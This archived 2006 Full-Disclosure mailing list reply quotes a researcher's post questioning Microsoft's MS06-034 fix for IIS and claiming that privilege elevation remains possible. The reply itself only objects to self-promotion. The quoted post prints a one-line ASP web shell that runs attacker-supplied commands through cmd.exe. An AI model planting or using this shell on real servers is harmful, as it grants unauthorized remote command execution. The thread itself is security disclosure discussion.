lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <20060726042840.12ADDDA824@mailserver7.hushmail.com>
Date: Tue, 25 Jul 2006 23:28:39 -0500
From: <daylasoul@...h.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc: 
Subject: Re: MS06-034 lies? IIS 6 can still be owned?



On Tue, 25 Jul 2006 19:39:23 -0500 Cesar <cesarc56@...oo.com> wrote:
>Hi all.
>
>After early getting the details of MS06-034 I thought
>it will be cool to build the exploits since there has
>been long time without any IIS exploit and our
>customers  (see *1) will like it, so I asked the guys
>to build the exploits and that I will take care of the
>part of elevating privileges since I had some theory
>that there was a way to elevate privileges. 
>What was funny is that some time later I realized that
>if you can upload an asp page then it's pretty simple
>to have a remote shell running under the same account
>that the exploits would run:
>
>-----shell.asp (got this from xfocus.org)------
><%=server.createobject("wscript.shell").exec("cmd.exe
>/c " & request("command")).stdout.readall%>
>-------------------------------------------
>So I wonder why MS patched the vulnerability if it's
>pretty simple to have a remote shell on default
>configurations?
>
>Mabye because wscript.shell can be disabled, removed,
>etc. or you can't run nor upload .exe on the server,
>in these cases the exploit will be handy.
>
>Also MS stated:
>-----------------------------
>on Mitigating Factors ....
>
>• On IIS 5.0 and IIS 5.1, ASP enabled applications by
>default run in the 'Pooled Out of Process'
>application, which means they run in DLLHOST.exe,
>which is running in the context of the low privilege
>IWAM_<machinename> account.
>  
>• By default, ASP is not enabled on IIS 6.0. If ASP is
>enabled, it runs in the context of a W3WP.exe worker
>process running as the low privilege 'NetworkService'
>account.
>
>on FAQ Workarounds...
>-What might an attacker use the vulnerability to do?
>An attacker who successfully exploited this
>vulnerability could take complete control of the
>affected system.
>
>----------------------
>That's pretty confusing since they are saying IIS 5 &
>6 runs under a low privileged accounts and then they
>say an attacker could take complete control...???
>
>My theory on the elevation of privileges was in part
>wrong but I could elevate privileges so now the
>exploits can also give you a remote shell under an
>administrative account which I think this is why MS
>patched the vulnerability.
>While MS fixed the ASP vulnerability they didn't fixed
>a design flaw that allows to elevate privilges if you
>can run code under IIS 5 & 6 low privileged accounts
>:)
>
>So no matter if you applied the fix, if you let users
>to upload an run binaries from ASP pages on default
>settings then your server can still be owned.
>
>
>
>Cesar.
>(*1 http://www.argeniss.com/products.html)
>
>__________________________________________________
>Do You Yahoo!?
>Tired of spam?  Yahoo! Mail has the best spam protection around 
>http://mail.yahoo.com 
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

please note that self-promotion is forbidden on the list.



Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ